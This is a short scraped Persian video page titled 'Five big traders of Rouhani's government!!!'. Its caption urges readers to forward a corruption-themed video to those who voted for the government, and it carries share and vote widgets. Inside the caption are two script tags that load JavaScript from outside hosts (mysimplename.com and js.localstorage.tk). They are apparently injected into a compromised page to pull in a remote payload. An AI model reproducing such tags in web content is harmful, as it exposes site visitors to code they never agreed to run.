پنج تاجر بزرگ دولت روحانی !!!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>این فیلم را برای تمام کسانی که به امید رفع فساد و آینده ای بهتر به دولت تدبیر رای دادند ارسال کنید!<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
14

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر